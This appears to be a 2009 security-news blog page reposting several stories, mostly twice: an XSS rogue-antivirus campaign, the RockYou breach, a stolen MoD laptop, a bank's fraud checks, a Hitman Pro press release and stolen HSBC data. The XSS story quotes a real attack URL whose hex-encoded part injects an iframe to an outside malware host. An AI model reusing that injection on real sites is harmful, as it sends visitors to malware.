Malware purveyors are exploiting web vulnerabilities in appleinsider.com, lawyer.com, news.com.au and a dozen other sites to foist rogue anti-virus on unsuspecting netizens.
The ongoing attacks are notable because they use exploits based on XSS, or cross-site scripting, to hide malware links inside the URLs of trusted sites. That's something application security expert Mike Geide doesn't see often. As a result, people who expect to visit sites they know and trust are connected to a page that tries to trick them into thinking their computer is infected.
"What's interesting ... is the fact that it's embedding iframes to redirect people," Geide, who is a senior security researcher at Zscaler, told The Register. "Typically, cross-site scripting is just that - it embeds script tags so it will embed javascript to run."
The malicious links are blasted out on web forums and typically look something like:
hxxp://lawyers.com/find_a_lawyer/content_search/results.php?sCHRISTINA%AGUILERA%20ANOREXIC%20PICS%3C%2F%74%69%74%6C%65%3E%3C%69%66%72%61%6D%65%20%73%72%63%3D%2F%2F%61%73%6B%35%2E%65%75%3E
The last chunk of test is hexadecimal-encoded HTML that redirects users to ask5 .eu (a space has been added for your protection). A series of redirect links ultimately leads to a site that looks similar to a Microsoft Windows screen with a popup claiming the PC is overrun with malware. The user is prompted to download rogue anti-virus to fix the imaginary problem.
While it's not the most convincing attack we've ever seen, there's nothing to stop attackers from using the same technique to push web-based exploits, say the Adobe Reader zero-day attack that's now circulating in the wild.
The links work because appleinsider.com and the rest of the sites being abused fail to filter out harmful characters used in XSS attacks.
More about the attack is available from the Zscaler blog here
Wednesday, 16 December 2009
One Of The 32 Million With A RockYou Account? You May Want To Change All Your Passwords. Like Now.
By MG Siegler
TechCrunch.com
December 14, 2009
It's no secret that most people use the same password over and over
again for most of the services they sign up for. While it's obviously
convenient, this becomes a major problem if one of those services is
compromised. And that looks to be the case with RockYou, the social
network app maker.
Over the weekend, the security firm Imperva issued a warning to RockYou
that there was a serious SQL Injection flaw in their database. Such a
flaw could grant hackers access to the the service's entire list of user
names and passwords in the database, they warned. Imperva said that
after it notified RockYou about the flaw, it was apparently fixed over
the weekend. But that's not before at least one hacker gained access to
what they claim is all of the 32 million accounts. 32,603,388 to be
exact. The best part? The database included a full list of unprotected
plain text passwords. And email addresses. Wow.
The hacker has posted a sample of what they found. They have blanked out
the passwords for now, but warns, "Don't lie to your customers, or i
will publish everything." As far as we can tell, RockYou hasn't issued a
warning about this to its users yet. We've reached out to the company,
but have yet to hear back.
TechCrunch.com
December 14, 2009
It's no secret that most people use the same password over and over
again for most of the services they sign up for. While it's obviously
convenient, this becomes a major problem if one of those services is
compromised. And that looks to be the case with RockYou, the social
network app maker.
Over the weekend, the security firm Imperva issued a warning to RockYou
that there was a serious SQL Injection flaw in their database. Such a
flaw could grant hackers access to the the service's entire list of user
names and passwords in the database, they warned. Imperva said that
after it notified RockYou about the flaw, it was apparently fixed over
the weekend. But that's not before at least one hacker gained access to
what they claim is all of the 32 million accounts. 32,603,388 to be
exact. The best part? The database included a full list of unprotected
plain text passwords. And email addresses. Wow.
The hacker has posted a sample of what they found. They have blanked out
the passwords for now, but warns, "Don't lie to your customers, or i
will publish everything." As far as we can tell, RockYou hasn't issued a
warning about this to its users yet. We've reached out to the company,
but have yet to hear back.
Not another Stolen Laptop
BBC News
12 December 2009
An investigation is under way after a laptop containing secret data was
stolen from the Ministry of Defence.
It was taken from the ministry's headquarters in Whitehall, central
London in late November, along with a key used to decode encrypted
files.
A spokesman said an investigation by MoD police was ongoing.
Shadow defence cecretary Liam Fox said the theft was "extremely
worrying". The incident is the latest in a string of thefts involving
MoD laptops.
Figures from the department earlier this year showed that 28 had been
lost or stolen between 1 January and 11 May.
And last July, the MoD admitted that 658 of its laptops had been stolen
in the past four years.
12 December 2009
An investigation is under way after a laptop containing secret data was
stolen from the Ministry of Defence.
It was taken from the ministry's headquarters in Whitehall, central
London in late November, along with a key used to decode encrypted
files.
A spokesman said an investigation by MoD police was ongoing.
Shadow defence cecretary Liam Fox said the theft was "extremely
worrying". The incident is the latest in a string of thefts involving
MoD laptops.
Figures from the department earlier this year showed that 28 had been
lost or stolen between 1 January and 11 May.
And last July, the MoD admitted that 658 of its laptops had been stolen
in the past four years.
Bank's antifraud tactics stun security expert: How much do they know?
By Ellen Messmer
Network World
12/14/2009
Checking out of a Hilton hotel in London, security expert Roger Thompson
was told his Visa card had been declined due to suspicions it was
stolen, a situation that only got more disconcerting when he learned the
bank that issued the card had more personal information on him and his
family members than he ever imagined.
In a tale he relates in his blog, Thompson, chief research officer at
AVG, said he was compelled to answer questions on the phone from a
Wachovia Bank representative in its fraud-prevention division to prove
he was really Roger Thompson and not a credit-card thief checking out of
the London hotel. Mitigating Litigation Risk with Email Management
Tools: Download now
It turns out Thompson's Visa card was flagged and suspended because he
hadn't told the bank he was travelling overseas, a requirement he didn't
know the bank had. But the "scary bit" about it all, he says, is that
the bank fraud-prevention representative didn't just ask him to give the
correct answers to questions such as his mother's maiden name, which he
had provided to the bank for fraud detection purposes, but also a host
of other questions about his daughter-in-law that he had no idea it
knew.
"I was in shock," Thompson says about what he found out that Wachovia
Bank had stored "at their fingertips" related to his daughter-in-law --
information Thompson thinks the bank may have found out through
Facebook.
Network World
12/14/2009
Checking out of a Hilton hotel in London, security expert Roger Thompson
was told his Visa card had been declined due to suspicions it was
stolen, a situation that only got more disconcerting when he learned the
bank that issued the card had more personal information on him and his
family members than he ever imagined.
In a tale he relates in his blog, Thompson, chief research officer at
AVG, said he was compelled to answer questions on the phone from a
Wachovia Bank representative in its fraud-prevention division to prove
he was really Roger Thompson and not a credit-card thief checking out of
the London hotel. Mitigating Litigation Risk with Email Management
Tools: Download now
It turns out Thompson's Visa card was flagged and suspended because he
hadn't told the bank he was travelling overseas, a requirement he didn't
know the bank had. But the "scary bit" about it all, he says, is that
the bank fraud-prevention representative didn't just ask him to give the
correct answers to questions such as his mother's maiden name, which he
had provided to the bank for fraud detection purposes, but also a host
of other questions about his daughter-in-law that he had no idea it
knew.
"I was in shock," Thompson says about what he found out that Wachovia
Bank had stored "at their fingertips" related to his daughter-in-law --
information Thompson thinks the bank may have found out through
Facebook.
Monday, 14 December 2009
Hitman Pro Available Through iRemove Amsterdam
32% of Computers Still Infected, Despite Presence of Antivirus Program
Hengelo, December 9, 2009. Computer users assume that the popular antivirus programs will protect them against malware (viruses, spyware, Trojans, etc). But our research shows this is not correct. Over 100,000 computers were scanned using our award-winning product, Hitman Pro 3, and almost 32% of the users that have an up-to-date antivirus program installed is still infected with malware.
"Our research shows that traditional antivirus programs cannot keep up with the cyber criminals", according to CEO Mark Loman. "Despite all their efforts, suppliers of antivirus programs release a solution days, sometimes weeks, after a new malware instance is released."
Mark Loman continues: "Our research also shows that not all antivirus programs detect the same threats. A combination of different antivirus programs would reduce the number of infections dramatically. This security strategy is already used successfully at the enterprise level, but has been difficult to implement for home users due to the increased resource requirements needed to run multiple antivirus programs and conflicts between different antivirus programs, both of which can adversely affect computer performance."
Hitman Pro 3 allows home users to use the detection and removal capabilities of multiple antivirus programs incorporated into one seamless solution, because the 7 antivirus programs are available via Internet (the Scan Cloud).
Research Results
107,435 computer users have used the free version of Hitman Pro 3 for the first time in the period from October 10 to December 4.
78,828 users had an up-to-date antivirus program installed. 28,607 users had not.
25,038 (32%) of the 78,828 users with up-to-date antivirus program were infected with malware.
13,002 (46%) of the 28,607 users without up-to-date antivirus program were infected with malware.
These 107,435 users have scanned their computer using the Behavioural Scan in Hitman Pro 3. All potential malware instances were submitted to the SurfRight Scan Cloud for further analysis. All of these malware samples were gathered in the period from October 10 to December 4 (55 days) in order to reflect actual malware samples "in the wild" and not a collection of "old" malware examples.
Top 10 of found malware
Rank Malware Infected
Computers
1. Generic 34,845
2. FakeAV 13,050
3. Alureon 5,915
4. Delf 4,116
5. Virut 2,868
6. Vundo 2,421
7. Small 2,342
8. OneStep 2,093
9. OnLineGames 1,946
10. Swizzor 1,854
The large number of generics is an indication that AV vendors are trailing behind in releasing signatures to detect new variants of malware. For example: The TDSS rootkit is in the top 3 of malware that Hitman Pro 3 detected last month. We received the first sample of TDSS/Alureon rootkit from a victim’s machine in our Scan Cloud on October 30, 2008. More than one year later, this particular rootkit sample still beats every major AV product.
Research Results
* It is not sufficient to assume you are protected if you have an antivirus program on your PC. Scan your PC regularly with a product from a different vendor for a second opinion.
* Do not simply extend the subscription of your antivirus program when it expires. In most cases it is better to upgrade to the latest version, as newer versions are in general better equipped to battle the newest sophisticated threats.
* Although vendors of antivirus programs are able to detect sophisticated threats, not all are able to remove it completely.
Click here for a detailed description of the research results and the methodology.
Hitman Pro 3
Hitman Pro 3 can scan a computer in only a few minutes from a USB Flash Drive, CD/DVD, local or network attached hard drive and will quickly reveal the presence of any malware using a Behavioural Scan. The actual verification of these potential malware files is then done on the Hitman Pro servers, the "Scan Cloud", which incorporates a hosted multi-vendor scanning service. Hitman Pro 3 uses 7 different antivirus programs to analyse the suspicious files.
Hitman Pro 3 can be used in addition to your existing antivirus program. Scanning your PC is free so Hitman Pro 3 is an ideal solution to check if your current antivirus program is protecting you sufficiently. A free version can be downloaded from www.hitmanpro.com
About SurfRight
SurfRight B.V. was founded in 2008, based on the freeware project Hitman Pro 1 and 2 with a user base of more than 3 million users. SurfRight is dedicated to the development of smart, efficient and user-friendly security solutions for the average computer user. Hitman Pro 3 and the Caretaker product family include solutions against unsolicited mail (spam), online fraud (phishing), viruses and other malware.
Hengelo, December 9, 2009. Computer users assume that the popular antivirus programs will protect them against malware (viruses, spyware, Trojans, etc). But our research shows this is not correct. Over 100,000 computers were scanned using our award-winning product, Hitman Pro 3, and almost 32% of the users that have an up-to-date antivirus program installed is still infected with malware.
"Our research shows that traditional antivirus programs cannot keep up with the cyber criminals", according to CEO Mark Loman. "Despite all their efforts, suppliers of antivirus programs release a solution days, sometimes weeks, after a new malware instance is released."
Mark Loman continues: "Our research also shows that not all antivirus programs detect the same threats. A combination of different antivirus programs would reduce the number of infections dramatically. This security strategy is already used successfully at the enterprise level, but has been difficult to implement for home users due to the increased resource requirements needed to run multiple antivirus programs and conflicts between different antivirus programs, both of which can adversely affect computer performance."
Hitman Pro 3 allows home users to use the detection and removal capabilities of multiple antivirus programs incorporated into one seamless solution, because the 7 antivirus programs are available via Internet (the Scan Cloud).
Research Results
107,435 computer users have used the free version of Hitman Pro 3 for the first time in the period from October 10 to December 4.
78,828 users had an up-to-date antivirus program installed. 28,607 users had not.
25,038 (32%) of the 78,828 users with up-to-date antivirus program were infected with malware.
13,002 (46%) of the 28,607 users without up-to-date antivirus program were infected with malware.
These 107,435 users have scanned their computer using the Behavioural Scan in Hitman Pro 3. All potential malware instances were submitted to the SurfRight Scan Cloud for further analysis. All of these malware samples were gathered in the period from October 10 to December 4 (55 days) in order to reflect actual malware samples "in the wild" and not a collection of "old" malware examples.
Top 10 of found malware
Rank Malware Infected
Computers
1. Generic 34,845
2. FakeAV 13,050
3. Alureon 5,915
4. Delf 4,116
5. Virut 2,868
6. Vundo 2,421
7. Small 2,342
8. OneStep 2,093
9. OnLineGames 1,946
10. Swizzor 1,854
The large number of generics is an indication that AV vendors are trailing behind in releasing signatures to detect new variants of malware. For example: The TDSS rootkit is in the top 3 of malware that Hitman Pro 3 detected last month. We received the first sample of TDSS/Alureon rootkit from a victim’s machine in our Scan Cloud on October 30, 2008. More than one year later, this particular rootkit sample still beats every major AV product.
Research Results
* It is not sufficient to assume you are protected if you have an antivirus program on your PC. Scan your PC regularly with a product from a different vendor for a second opinion.
* Do not simply extend the subscription of your antivirus program when it expires. In most cases it is better to upgrade to the latest version, as newer versions are in general better equipped to battle the newest sophisticated threats.
* Although vendors of antivirus programs are able to detect sophisticated threats, not all are able to remove it completely.
Click here for a detailed description of the research results and the methodology.
Hitman Pro 3
Hitman Pro 3 can scan a computer in only a few minutes from a USB Flash Drive, CD/DVD, local or network attached hard drive and will quickly reveal the presence of any malware using a Behavioural Scan. The actual verification of these potential malware files is then done on the Hitman Pro servers, the "Scan Cloud", which incorporates a hosted multi-vendor scanning service. Hitman Pro 3 uses 7 different antivirus programs to analyse the suspicious files.
Hitman Pro 3 can be used in addition to your existing antivirus program. Scanning your PC is free so Hitman Pro 3 is an ideal solution to check if your current antivirus program is protecting you sufficiently. A free version can be downloaded from www.hitmanpro.com
About SurfRight
SurfRight B.V. was founded in 2008, based on the freeware project Hitman Pro 1 and 2 with a user base of more than 3 million users. SurfRight is dedicated to the development of smart, efficient and user-friendly security solutions for the average computer user. Hitman Pro 3 and the Caretaker product family include solutions against unsolicited mail (spam), online fraud (phishing), viruses and other malware.
Stolen bank data mixed into list of French tax dodgers
By John Leyden
The Register
11th December 2009
The legality of a French crackdown on suspected tax evaders earlier this
year has been thrown into doubt after it emerged that stolen data was
among the mix of information used by financial investigators.
A list of 3,000 French nationals suspected of using Swiss banking
secrecy to evade paying taxes included data handed over by a former IT
worker for HSBC in Switzerland - without the bank's permission - to the
French authorities.
In a statement, HSBC in Switzerland confirmed a worker suspected of
stealing information from the bank between 2006 and 2007 was prosecuted
last year. The data involved less than 10 accounts held by Geneva-based
HSBC Private Bank, according to HSBC. It's unclear whether the unnamed
worker involved was convicted of any offence. French daily Le Parisien
reports that the former bank staffer has fled to France and is living
under judicial protection.
French daily Le Figaro claimed on Friday that up to 4,000 French clients
of the bank, collectively holding €6 billion ($8.8 billion) in assets in
Switzerland, were named on the stolen list. Only an unspecified
proportion of those named on the list (which sounds like a data dump,
perhaps indexed by a residential address in France) are suspected of tax
evasion.
The Register
11th December 2009
The legality of a French crackdown on suspected tax evaders earlier this
year has been thrown into doubt after it emerged that stolen data was
among the mix of information used by financial investigators.
A list of 3,000 French nationals suspected of using Swiss banking
secrecy to evade paying taxes included data handed over by a former IT
worker for HSBC in Switzerland - without the bank's permission - to the
French authorities.
In a statement, HSBC in Switzerland confirmed a worker suspected of
stealing information from the bank between 2006 and 2007 was prosecuted
last year. The data involved less than 10 accounts held by Geneva-based
HSBC Private Bank, according to HSBC. It's unclear whether the unnamed
worker involved was convicted of any offence. French daily Le Parisien
reports that the former bank staffer has fled to France and is living
under judicial protection.
French daily Le Figaro claimed on Friday that up to 4,000 French clients
of the bank, collectively holding €6 billion ($8.8 billion) in assets in
Switzerland, were named on the stolen list. Only an unspecified
proportion of those named on the list (which sounds like a data dump,
perhaps indexed by a residential address in France) are suspected of tax
evasion.
Subscribe to:
Posts (Atom)